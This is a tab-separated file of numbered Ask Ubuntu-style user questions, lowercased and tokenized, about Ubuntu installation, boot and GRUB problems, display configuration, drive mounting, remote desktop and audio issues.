313348	how to clone ubuntu 13.04 and boot - `` mbr error 1 press any key to boot from floppy ''	i need to clone ubuntu 13.04 that was previously tuned to 50 identical computers . i 've tried to clone from source disk to another using acronis true image or clonezilla . it seems that all partitions was copied but i ca n't boot from this copy on the target computers . on another hand , i 've inserted `` original '' hdd to the destination computer and it did n't boot too . there is a message `` mbr error 1 press any key to boot from floppy '' . could uefi or gpt hdd be a reason of this issue ? i have ubuntu 10.10 on the old pc and if i put it to a new pc it boots with no issues . that old hdd is not gpt . the new hdd is gpt . and yes , source disk works on the source computer , but does n't work on the destination computer .
313349	last date/time the user logged in	i think someone is trying to use my notebook without my permission . i was thinking about an option like last logged date/time to check ... is there something like that in ubuntu ? how can i enable it ?
313359	what does the [ default ] written in the beginning of some files indicate and mean ?	i have seen this especially in /etc folder , which perhaps means it should be the default configuration ? p.s . : the main reason behind asking this is , adding [ default ] to the top of file renders all comments in blue colour which are otherwise white in `` vi '' editor .
313361	custom keyboard shortcut for workspace switcher	i would like to change the keyboard shortcut for the workspace switcher in unitity . how can i do that ? currently it is set to supre+s . i would like to set it to ctrl+` . strangely enough i can find this option neither under the system settings > keyboard > shortcuts nor in ccsm..
313365	how install kernel header in ubuntu	i am using ubuntu 12.04 64 bit whenever , i am giving following command in the teminal dpkg -s kernel or dpkg -s kernel-headers both the output shows kernel or kernel headers are not installed .. how to solve this issue ? i have already tried to install the same using , sudo apt-get install linux-headers- $ ( uname -r ) but the problem is not solved . i am new to ubuntu .. please help me
313371	using ubuntu with a dial-up connection	is it possible to install ubuntu on a machine with only a dial-up connection ? that is , does the ubuntu install cd come with everything needed to set up an internet connection using a dial-up modem ( i have a usrobotics courier v.everything connected to a rs232 port on a lava quattro-pci ) . i presently run centos ( 5.9 ) , which does include support for dialup internet access out-of-the-box ( all of the modules for dialup are on the distro dvd ) . when i ran the ubuntu cd ( 12.04.1 desktop ) , there was no sign of dial-up internet support . am i faced with a chicken or egg problem ?
313379	i installed 64 bit os in 32 bit processor	as the title suggest , i accidentally installed 64bit ubuntu 13.04 in 32bit processor , and it is working fine for now ( actually i feel my pc became more responsive ) . will there be any problem in the near future though ? i think my motherboard is a 64bit but i 'm not certain , but my processor is a 32bit . further , i did lscpu and i got this : architecture : - x86_64 cpu op-mode ( s ) :32-bit , 64-bit byte order : little endian cpu ( s ) : 1 on-line cpu ( s ) list : 0 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 15 model : 4 stepping : 9 cpu mhz : 2659.023 bogomips : 5318.04 l1d cache : 16k l2 cache : 1024k numa node0 cpu ( s ) : 0
313390	no gui after installing	installed ubuntu 13.04 on a dell laptop i had laying around . install goes well but when i 'm done , i only get a command line , no gui at all . tried several versions , tried 32 vs 64 bit all give me the same result . any ideas on what to do/try ?
313396	screen size and resolution conflict	i am a linux noob and could use a little help with an issue . i am trying to achieve a very specific resolution and screen size ( 720x480 @ 59.94 ) for my headless ubuntu 12.04.2-64 desktop box with a nvidia geforce 8400 gs card . the machine is used primarily for ssh and the gui ( remotely ) . the restricted drivers have not worked for my situation . i have created and tried to change the xorg.conf file according to the man but i am not achieving the desired result . the edited xorg.conf file displays the desktop in the desired scale or resolution but the screen output always 1280x768 . when i try and add displaysize 720 480 to the monitor section it breaks the file and will not produce a desktop . here is the xorg.conf file : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' load `` record '' load `` dri2 '' load `` dbe '' load `` extmod '' load `` dri '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` hwcursor '' # [ < bool > ] # option `` noaccel '' # [ < bool > ] # option `` shadowfb '' # [ < bool > ] # option `` videokey '' # < i > # option `` wrappedfb '' # [ < bool > ] # option `` glxvblank '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` pageflip '' # [ < bool > ] identifier `` card0 '' driver `` nouveau '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card1 '' driver `` fbdev '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card2 '' driver `` vesa '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 1 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 4 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 8 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 15 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 16 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 1 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 4 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 8 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 15 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 16 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 1 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 4 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 8 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 15 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 16 endsubsection subsection `` display '' viewport 0 0 modes `` 720x480 '' depth 24 endsubsection endsection xrandr prints this : screen 0 : minimum 320 x 200 , current 1280 x 768 , maximum 8192 x 8192 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-1 connected 1280x768+0+0 ( normal left inverted right x axis y axis ) 370mm x 222mm 1280x768 60.0*+ 49.9 1280x1024 60.0 1024x768 60.0 800x600 60.3 720x576 50.0 720x480 59.9 640x480 60.0 vga-1 disconnected ( normal left inverted right x axis y axis ) here is my xorg.0.log file : http : //pastebin.com/u5fte2ks any help would be greatly appreciated !
313398	gparted and reallocation	i had a triple boot configuration with windows 7 , mint 13 , and ubuntu 13.04 . i deleted the mint os . using gparted i shrunk the old mint ( sda5 ) and now have unallocated space ( see below screenshot ) . i would like to optimize the ubuntu os by reallocating that space to the ubuntu section . what is the best way to do this ? increasing the ubuntu size or the swap size ?
313400	unable to move files and folders	i use ubuntu 12.04 and all my drives are of the ext4 file system . i tried to cut and paste a folder from the location /home/username/documents to a logical drive which is of the ext4 file system but i could n't . there was no option for paste at all . i tried ctrl+v but that also did n't work . why is that and what do i need to do to move the folder ?
313405	ubuntu touch for galaxy s3	when it 's going to be officially released ? i 've seen some tutorials to install on my s3 , but i 'm waiting for the official release . is there any planned release date ? i 'm sorry if my english is not so good .
313406	how to install vnc server so i can have complete control on my ubuntu server ?	i installed ubuntu server 12.04 . i installed gnome desktop on that ( gui essential for my purpose ) . now i want to control the server remotely . i tried following things and not very successful : 1 ) installed xrdp , but it is very laggy . not useful for me . 2 ) installed nomachine , it is better than xrdp but not good enough for my purpose . 3 ) installed vnc server and used tigervnc to connect it . it gave the best result . i want to continue to use it . but i am facing following problems : i cant login as root through vnc . ( is it possible , kindly tell me how to do . ) vncuser account dont have sufficient privilleges . i added it to sudoers list . but there are n number of technical glitches . got problem in installing softwares . ca n't start chrom web browser and a lot of different things . so can anybody tell me how to get access to my remote server through tiger vnc and have complete control on my server ? if there is any other solution apart from using tiger vnc , i am open to it .
313409	why does n't system settings remember my proxy settings ?	i do this : start `` system settings '' '' network settings '' '' proxy '' '' use proxy auto configuration url '' i paste my pac url into the new text field '' apply '' i click anywhere ( `` network connections '' , `` overview '' , close button ) i go back and the proxy settings are gone . how i can make the proxy settings stick ?
313414	mark first file in filemanager starting on letter `` x '' ( mimicking windows )	in windows , when i am looking for a file in the current directory which name i ( at-least partly ) know . i simply start by pressing the first letter in the name , to jump to the first item starting with that letter . in the default ubuntu file-manager , it instead starts a search showing all items containing whatever input . how can i mimic the windows way ?
313416	differences between standard keyboard layout in windows and linux ?	i 'm want to switch from using mostly osx to using mostly linux ( for everything unix ) and windows ( unfortunately , because of work , i need to be effective using excel/outlook and various other apps in the `` native '' enviroment , wine wo n't do ) in vms . now , i know there are differences in the keyboard layout of osx and linux ( @ key , ' key etc . etc . ) , but does ubuntu and windows have the same keyboard layout ? ( my goal is to be able to use ubuntu 90 % of the time and seamlessly switch into windows when i have to . ) if there are any differences , what are they ? and is it possible to make linux use the same keyboard layout as windows ?
313417	back to factory settings	i need to return my computer to the company after our mass lay off . i want to remove everything . i care nothing about any files . just need it all removed . please advise me , as i am obviously a novice . thank you in advance ! !
313419	asus xonar dg not working ubuntu	i 've checked the `` questions that may already have your answer '' to no avail . basically , there is no sound at all , the snd_oxygen drivers are all being loaded . i can see the sound card and all of it 's separate ports in settings- > sound- > output , but nothing is coming out . i tried adjusting the volume in alsamixer , but for some reason the volume wo n't change ( all that is there are some options [ speakers , headphones , fp headphones ] and they change when i press the up/down arrow keys ) at all . i have also tried many other terminal commands , such as reloading alsa and checking if the sound card is even being detected , which it is . i 'm left clueless . it says on a bug report that this has been unassigned for over a year . surely that 's not right . thanks in advance , caelan .
313422	cant write to usb drives . ubuntu 13.04	i can not write to any usb drives , hard drives or flash . they mount fine and i can read off them but ca n't copy anything to them as it tells me i do not have permisions . my drives are formated from my mac as mac journald and the permissions are to let everyone read and write to them . from linux the permisions are `` owner user # 99 '' i have tried for weeks to figure this out and tried may things i found here on the site but nothing has worked . if you have any ideas please help , but you must be very specific as i am new to linux and it is very hard to understand all the terminal talk . thanks carey
313427	my computer will not reboot after fresh install of ubuntu 12.04lts	i bought a new computer yesterday and it came with windows 8 . when installing ubuntu , i choose the erase and install option thinking that ubuntu would install easily like it did for my old laptop ... after a successful install and following the instructions telling me to reboot to finish installation and remove installation media . it worked and my computer booted fine , however once i began installing updates via update manager and activating additional driver { ati/amd proprietary fglrx graphics driver ( post-release updates ) } out of the following : experimental amd binary xorg driver and kernel module ati/amd proprietary fglrx graphics driver ( *experimental*beta ) ati/amd proprietary fglrx graphics driver ( post-release updates ) then reboot to finish making changes i reboot and get an error ( reboot and select proper boot device ) > > > > > at this point i was stuck , so i eventually reinstalled ubuntu and repeated the exacted same steps until right before i rebooted to finish making changes . however this time i used this boot repair tool sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair boot-repair after running the program i get a `` boot successfully repaired '' message . then i try to reboot again and get the gnu grub screen where it says would you like to boot : normal recovery memorytest once it begins loading , you see the code moving across the screen then it pauses when it gets to and doesnt do anything . if someone could tell me how to fix this or get windows 8 back soon , i 'd appreciate it because like i said i just bought it yesterday and now i cant even use it .
313431	remove drive partitions before installing 12.04 ?	i have an old box and want to switch to ubuntu 12.04 . it has two hard drives . the first is a 40 gig disk that runs windows xp ; the other is 80 gigs partitioned into 40 , 20 , and 20 gigs . i am prepared to abandon windows altogether and everything stored on the drives . so my question is , do i just install from cd/dvd onto the c drive ? or onto one of the partitions in the other disk first and then uninstall windows ? what will happen to the partitions on the second disk , which i do n't particularly see a need for ? thanks in advance for any advice .
313435	changed grub settings now ca n't load ubuntu	i changed the timer setting on grub to 0 seconds , this was accidental . now my computer boots straight into windows 8 as this was my default grub option . since the grub menu no longer appears ( as the delay is 0 seconds ) i ca n't boot into ubuntu . is there any way to change the grub settings from windows or boot into ubuntu in another way ? any help would be much appreciated . thanks
313437	is there a list somewhere of printer-drivers for 13.04	before i purchase a new printer i would like to figure out if there is a linux driver available .
313438	hibernation still not available	tried the workaround posted here how to enable hibernation ? but not even after rebooting , updating grub or kilall unity-panel-service commands do reset unity but no hibernation is available on `` start '' button . when sudoedit file saves as /vm etc etc , tried chaging this name to the /etc/polkit loclauth etc etc but wouldnt let me save the file there must be doing something wrong , because i browse to /etc/polkit-1/localauthority/50-local.d and there are no files there
313441	how to collect the earnings in the software center	does anyone know what process should i follow in order to collect the earnings from the sales of software published in the software center ? is there any restriction related to the minimum amount to be collected by those earnings ? original question in spanish
313454	question about this shell command	i am new to ubuntu and learning how to use shell . would someone please tell me what this command does : sudo sh -e ~/downloads i know sudo sh will execute all commands in the shell as sudo . what is -e ?
313455	brightness settings from terminal	i do change the turn screen off when incative for : often using the below screen in ubuntu 12.04 . how do i change the same from the terminal ? i did check in the gconf-editor , but could n't figure it out . i use the below commands for turning the monitor off and for the locking the screen quickly from the terminal . alias off='xset dpms force off ' alias lock='gnome-screensaver-command -a'
313456	where can i find stories from people moving from a windows os ?	i am seeking a place where to find stories of individuals and businesses that may have switched from a windows os to ubuntu and were/are happy with their switch and why ?
313457	error installing ubuntu touch on galaxy nexus	i am getting an error when trying to install ubuntu touch on my galaxy nexus . i run ubuntu 13.04 from a live usb , i do n't know if the error is related to this . ubuntu @ ubuntu : ~ $ phablet-flash -b traceback ( most recent call last ) : file `` /usr/bin/phablet-flash '' , line 19 , in < module > import logging importerror : no module named logging thank you for your help
313459	would i be able to update 12.04 lts to 13.04 ?	after installing ubuntu 12.04 lts , would i be able to update my system to 13.04 without losing my data ? and how i will do it ? can anyone tell me ?
313460	install ubuntu on a seperate hard-drive in dualboot	i am trying to install ubuntu 12.10 on a hard-drive that is separate from the one windows 7 is on . i have two drives in my computer and the second is unused and blank . however , when i go to install ubuntu and select the something else option , i get kind of paranoid . last time i did this , it wiped my windows drive and still installed in the second drive . i do now want a repeat of that . if someone could give me instructions on dual booting ubuntu with windows 7 using two hard-drives that would be great .
313478	how do i fix a `` failed to download repository information '' error in software center ?	while trying to install media players and adobe flash player i bumped into an error in the software centre and they 're not getting installed . i 'm also unable to install synaptic package manager due to this . the message i am given is failed to download repository information where should i go from here ?
313479	which google chrome version should i install for my system ?	the computer is a toshiba satellite system , and it was left here by an old roommate who destroyed the windows 7 operating system . he repaired it by installing ubuntu on it . we are in desperate need of another computer , but for now i 'm figuring out how to install chrome on this installation . further system information : ubuntu 12.04.1 lts memory : 2.7 gb processor : amd turion ( tm ) ii p540 dual core processor graphics : gallium 0.4 on llvmpipe ( llvm 0x300 ) os type : 32-bit disk : 154.6 gb . when trying to install google chrome i was asked what download package to choose : 32 bit deb ( for debian/ubuntu 64 bit deb ( for debian/ubuntu ) 32 bit rpm ( for fedora/opensuse ) 64 bit rpm ( for fedora/opensuse ) so which one do i choose ? i know that i have a 64 bit computer , and ubuntu says that my os type is a 32 bit . also , is there any way to upgrade to where it recognizes that it is a 64 bit system ?
313483	how do i change firefox 's `about : config` from a shell script ?	on of the first things i do when first using a fresh firefox profile , is to set browser.urlbar.trimurls to false ( which really should be changeable though âpreferencesâ or should have remained default ) , and to change the search and homepage defaults to duckduckgo . currently i manually go to about : config , click through the angry warning message , and search for the keys ( which unlike in dconf editor , are n't even organised ) . so i would like to know how to read and write these keys from the command-line so that i can add these tweaks to my customisations script .
313486	gnome source code of fade out effect for inactivity	where i can find the source code for fade out animation when the computer is inactive for x minutes ? i guess that it somewhere in /usr/share/gnome-shell/js/ui but i want to find the line . note - this question is not a duplicate of this : brightness settings from terminal i want to modify the gnome code . i want to localize where the fadeout effect is present
313487	new install and gaming issues	i 'm totally new to linux , but i 've basically had enough with using windows . a recent hdd failure has prompted me to take this as a good time to switch ( my new setup will be a 250gb ssd and 1tb hdd for media ) . most of my tasks involve simply using browsers , checking emails , compiling latex and so on . however , i do still occasionally play games on my pc ( on steam ) and this seems to be the only negative of switching to ubuntu . so , my question is basically one of the best solution for installing ubuntu but still being able to play steam games ( i am aware that they now support some games ) . from what i gather , i have these options : 1 ) just install ubuntu and use a program like wine to run games . 2 ) partition my drive so that i have one for windows for when i want to play games and another for ubuntu , for everything else . the only advantage of 1 ) is that i 'll have more disk space without having to install windows ( and potentially create too large of a partition for it . i assume that the games should be installed onto the same partition as the os ? ) . on the other hand , it feels natural to me that running games through a program like wine is n't going to be all that great - can it handle newer games well ( civ v , csgo ? ) ; does one see a general drop of frame rate ? option 2 ) seems like the best option for me , but then i need to decide on how to partition the drive and risk losing unnecessary space . i would be very grateful to hear opinions on the best solution . i am totally new to ubuntu and this forum , so apologies if the question is n't appropriate , is poorly phrased , or is too long !
313489	how to make videos show thumbnail in ubuntu 13.04 ?	i have ubuntu 13.04 and many of my videos do not show thumbnails whereas some do , they are all mp4 formats including the ones that do show thumbnails . is there a way to make all videos show thumbnails ? the ones that do show them were on my old operating system when i had windows 7 so after movinng them from pc to external hardrive to pc ( with new os , ubuntu 13.04 ) the thumbnail remained , whereas new videos do not show the thumbnail .
313497	install ubuntu in a specific partition side by side with windows 7	i have one question . my computer have two partition . first is 32gb with windows 7 and the other empty space is 22gb and i would like to install ubuntu in it . how to do it ? because i always encounter problem as the choosing of partition is a little bit complicated . i would appreciate any other users can help me and guide me a step by step instruction : ) tq for your help : )
313498	locked out and ca n't get grub to load	here are the main facts : i can not log in as anything but guest . ubuntu says invalid password ( although i did not change it and i could log in before ) . grub does not load when i press shift on boot . so i ca n't log in to modify /etc/default/grub to get it to load . any solutions ? all the posts i have read about getting locked out assume that pressing shift will make grub appear ( it does n't ) . all the posts i have read about making grub appear assume i can log in and modify /etc/default/grub ( i ca n't ) . what i did do was to change my sudo password . it worked fine while i was logged in . i rebooted and neither the user 's password nor the new sudo password will allow me to log in . i suspect that the new sudo password may be what caused this . edit - is this a bug ? as is so often the case i solved my own problem right after posting . i noticed that when i tried to log in with my user password , i got an invalid password error . but when i tried to log in with my sudo password , the screen went blank as though i would be logged in , but then i got sent back to the login screen . solution : i used ctl-alt-f1 to go into console mode . i tried to log in with my user password and failed . but lo and behold when i logged in with the sudo password i got logged in ok. then i just changed my user password to what it was originally , rebooted an logged in . questions : 1 ) the first thing i did when i found i could log in with the console was to edit /etc/default/grub , setting grub_hidden_timeout=10 and grub_hidden_timeout_quiet=false . i still ca n't get grub to load , so i ca n't boot in recovery mode . how can i get grub to load ? ? ? ? 2 ) having the same password for sudo as for the main user is a bad idea . how can i have a different password for sudo ? if i change the sudo password it breaks the graphical login . this is what i think is a bug .
313499	how do i load the ubuntu-desktop on 12.04 server	i need to load the gui on 12.04.2 . i ran : sudo apt-get update sudo apt-get install ubuntu-desktop sudo reboot i did not see any errors but i do not see a gui , just the cli how do i start the gui ?
313500	ubuntu 13.04 works fine from live usb but ca n't boot after install	it just gets stuck on the black screen while loading its services . it boots if i go into recovery mode then i select resume normal boot but it 's very slow and the laptop fan goes crazy . it works perfectly fine and fast from usb . any help ? edit . i have an nvidia geforce gt555m and the notebook model is asus n55s edit 2 . does ubuntu uses the nvidia driver when i boot from usb or the open source drivers ? if it uses the open source drivers , i would like to keep using those . everything works great from usb , it fails to boot after install and if i resume normal boot from recovery mode , it works but it is very slow and the fan goes nuts . also i see no nvidia driver when i go into additional drivers tab , maybe that helps .
313501	unity mail opens ubuntu tour instead of account url in browser	the problem is not only with unity mail but also other applications . for example when i go to help menu in sublime 2 and click purchase license , firefox opens this file : file : ///usr/share/doc/ubuntu-online-tour/en/index.html same with the unity mail icon in the menu bar . it used to open the url i specified in the preferences , but now it takes me to this online tour html file .
313503	help with gdb on a c++ program	i am new to ubuntu and am using the 12.04 version on my laptop . i am trying to execute a c++ program which has petsc libraries installed in it . i get an error when trying to run the program and so have installed gdb in ubuntu . the name of the program is ex1.c and is located in a folder called 'petsc-3.1-p8 ' on my computer . how do i run gdb in the terminal to see what is the error while i run this program ? thanks in advance..
313506	would ubuntu be installed with the current language of windows 7 ?	if i install ubuntu on samsung notebook that is formatted for spanish will ubuntu be in english which is preferred ? if i install ubuntu will i lose my pictures in google picasa ? i am not real computer literate but tired of windows .
313513	create link ( command shortcut ) to script	i am new to ubuntu . i am trying to create a link to a script so that when i type ideaiu in the terminal , it opens /home/bob/programming/libs/intellij/bin/ and runs idea.sh script from there . i tried to put export ideaiu= '' /home/bob/programming/libs/intellij/bin/idea.sh '' to .bashrc , but it has not helped .
313515	unable to mount cifs share from /etc/fstab	i have a line in my /etc/fstab for ages that stopped working since 13.04 : //192.168.100.2/share /mnt/popcorn cifs username=myusername , password=mypassword , user , gid=sambashare , file_mode=0664 0 0 and it gives me : mount /mnt/popcorn mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) dmesg is as helpful as sunshine in the desert : [ 622.471321 ] cifs vfs : send error in sesssetup = -13 [ 622.471458 ] cifs vfs : cifs_mount failed w/return code = -13 i know the user/pass combo is correct , as this works fine : bart @ dosar : ~ $ smbclient //192.168.100.2/share -- user=myusername enter nmt 's password : domain= [ workgroup ] os= [ unix ] server= [ samba 3.0.32 ] smb : \ > ls ... how can i permanently mount a cifs/samba share on ubuntu 13.04 ?
313521	how do i change the default location for the desktop ?	i want to change the location of my desktop so if i save a file to the desktop it will save to a folder in my other hard drive
313526	changing login screen wallpaper	i have been trying to change my login screen wallpaper to one of my own using ubuntu-tweak . the wallpapers are located in ubuntu 's default wallpaper folder and i have given all users read privileges on them . now there is n't even a wallpaper left on the login screen .
313529	vm does n't pick up any ip address	i 'm running virtualbox in bridged mode on a windows host . ifconfig returns this : here 's the etc../interfaces file : here 's the output of ifconfig -a : here 's the output of route how can i force it to grab an ip address from the dhcp ?
313533	how do you access the hard drive in ubuntu ?	i just loaded ubuntu to replace windows . i am trying to load the sims 3 game , and it requires a 'no cd ' file to be added to it . how do i access the hard drive to make changes to folders ?
313538	ocassional flickering screen	i have installed ubuntu on my vaio vgn-fe790g laptop which has a intel速 945gm driver . the screen works fine , but whenever i open the launcher ( with its transparent layer ) , or if i am in a game , i get these weird screen flickering thing . here is a 5-sec video of it doing that . i should say that it is otherwise ok and this only happens when i 'm trying to something graphically non-trivial . fyi , i have ubuntu 13.04 installed but this used to happen also on the previous versions . any idea how i can fix it ? keep it newbie-friendly please ! : ) system info : video card : driver : intel open source technology center mesa dri intel ( r ) 945gm x86/mmx/sse2 driver version : 1.4 mesa 9.1.3 desktop color depth : 24 bits per pixel monitor refresh rate : 59 hz vendorid : 0x8086 deviceid : 0x27a2 number of monitors : 1 number of logical video cards : 1 primary display resolution : 1280 x 800 desktop resolution : 1280 x 800 primary display size : 13.31 '' x 8.31 '' ( 15.67 '' diag ) 33.8cm x 21.1cm ( 39.8cm diag )
313539	why i have to remove so many packages when i try to install zlib1g-dev : i386	when i try to install zlib1g-dev : i386 , i got below message : sudo apt-get install zlib1g-dev : i386 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libc6-dev : i386 linux-libc-dev : i386 suggested packages : glibc-doc : i386 manpages-dev : i386 recommended packages : gcc : i386 c-compiler : i386 the following packages will be removed : dkms gcc gcc-4.7 nvidia-310-updates the following new packages will be installed : libc6-dev : i386 linux-libc-dev : i386 zlib1g-dev : i386 0 upgraded , 3 newly installed , 4 to remove and 0 not upgraded . need to get 6,605 kb of archives . after this operation , 194 mb disk space will be freed . do you want to continue [ y/n ] ? i have to remove dkms gcc gcc-4.7 nvidia-310-updates why ? if i remove them , will my ubuntu has problem ? my nvidia driver version is 310.44 , can i remove nvidia-310-updates ?
313544	spdif input not working	one of my motherboard has two spdif sockets . one input and one output . under windows these work fine and i am able to achieve what i 'm trying here . i want to set ubuntu up so it will play the digital input out the analogue output ( normal headphone jack ) . under my input devices there is no digital options , and under configuration there is no option for digital stereo input i only have options for digital output and analogue input , when really i want it the other way around . can anyone shed any light ? error when starting gnome-alsamixer :
313545	12.04 booting into terminal	to preface this , i would like to say that i am completely new to ubuntu and have essentially zero programming experience/experience working with command line and terminal . i installed ubuntu because i would like to get into programming . if you could provide me with the simplest instructions possible , i would be grateful . i have a lenovo ideapad y500 ( intel i7 , nvidia gt 750m , 1tb hdd , 16gb ssd cache , 8gb ram ) with windows 8 on it . using a live cd , i installed ubuntu 12.04 onto a 75 gb partition . during the installation , i kept all default settings except for one thing ; i decided to encrypt my home folder , and so checked the corresponding box . the installation completed , and i restarted . once i restarted , i saw the options '' ubuntu , with linux 3.2.0-23-generic '' '' ubuntu , with linux 3.2.0-23-generic ( recovery mode ) '' '' memory test ( memtest86+ ) '' '' memory test ( memtest86+ , serial console 115200 ) '' '' windows recovery environment ( loader ) ( on /dev/sdb3 ) '' '' windows 8 ( loader ) ( on /dev/sdb5 ) '' '' system setup '' i chose the first option , and was directed to a screen with the ubuntu logo and the row of five dots below that change from orange to white . then , i was brought to a full screen terminal that prompted me to login , which i did . i saw no option to boot into gui at all , and am lost . i 've been searching around and have tried the `` startx '' command to no avail . should the command have some sort of context or something ? i 've also tried selecting the recovery mode option from the boot manager . i 've tried the resume option from the following menu , which eventually just shuts down the computer after displaying a lot of scrolling text that 's too fast for me to read . i 've also tried the failsafex mode from the recovery mode menu , which only brings up a terminal box at the bottom of the window that covers the entire bottom part of the screen . commands wo n't work in this window . when i try to access windows 8 , i get a message saying that the efi file path was not specified or something along those lines . i had to enable secure boot in order to access windows 8 ( i had disabled it to be able to boot from the live cd ) , which is functioning normally . i am at a complete loss for what to do . any help will be extremely appreciated . edit : bonus question ! if you could figure out a way for me to boot to windows 8 without having to enable secure boot , it would save me a lot of trouble . i can deal with switching every time , but i 'd rather not have to .
313547	xfce4 - 'run program ' dialogue box does not appear when double clicking script	ubuntu 12.04 > xfce4 on my previous ubuntu distro , when i double clicked scripts i got a little dialogue window that asked me if i wanted to run the script as a program or run it in terminal . similar to this window : since upgrading , i have never seen that window . i have ensured that the option to 'allow executing as a program is enabled ' and the script works if i run it through terminal . i simply just do n't get the prompt . any ideas ?
313551	ubuntu one saved after hard drive wiped ?	i am pretty sure the answer is `` yes '' to this question , but i felt i had to ask anyway . if i am using ubuntu one for mac , and my hard drive might be wiped , will ubuntu one keep the files i synced most recently before my computer got wiped ?
313554	how to control gnome-terminal from python scrypt ?	i am developing an application in pygtk , and would like to launch a gnome-terminal and output commands to it . my user should then be able to modify the command , or maybe ignore using the up arrow ... etc . i have been able to launch a terminal , but ca n't work out how to send commands . this is how my application starts : class app ( gtk.window ) : def __init__ ( self ) : gtk.window.__init__ ( self ) process=subprocess.popen ( [ `` gnome-terminal '' , `` -- class=app '' , `` -- name=app '' ] , shell=false , stdout=subprocess.pipe , stderr=subprocess.pipe ) response , error=process.communicate ( )
313555	no space on device	today i tried to move a huge directory to a common directory for 2 users . i first tried to change the permissions of my home directory . so something happened with my ~/.private directory and the disk was full ! i have a 2 tb disk . i can not make a backup , i can not even enter graphics mode . please help . are there a way to restore my contents without making backup ? even creating ~/private is impossible -- `` no space on the device '' . i have no private , and do n't tell me that i have erased it , because it is not true . are there some utilities to restore the files and make them not encrypted ?
313556	i am stuck at the `` gnu '' screen and i need to know how to get past it	i have had ubuntu 12.04 for 6 days now and now , for some reason , i am getting the grub screen when i try to restart my computer . when i turn it on , it asks me , since i also have windows 7 on my laptop , if i want to start with windows 7 or ubuntu . when i choose ubuntu , it brings me to the grub screen . how do i get to my normal ubuntu desktop when in my computer appears the next message ? gnu version 1.99-21ubuntu3.9
313560	audio cd s not burning to mp3 format-burning to wav format in k3b and brasero using ubuntu 12.04.2	it started in ubuntu 13.04-i was doing what i usually do , i opened brasero to make an audio cd from a few mp3 audio files..when burned i noticed the files on cd were in wav format.i then tried k3b with the same result.at that point and because of several issues with 13.04 i formatted my hdd and dropped back to ubuntu 12.04.on 12.04 i tried brasero and k3b once again with same results.i know that when i used to burn cd s using brasero they were burned to cd in mp3 format not wave.can anyone tell me a fix for this ? i have restricted codecs installed .
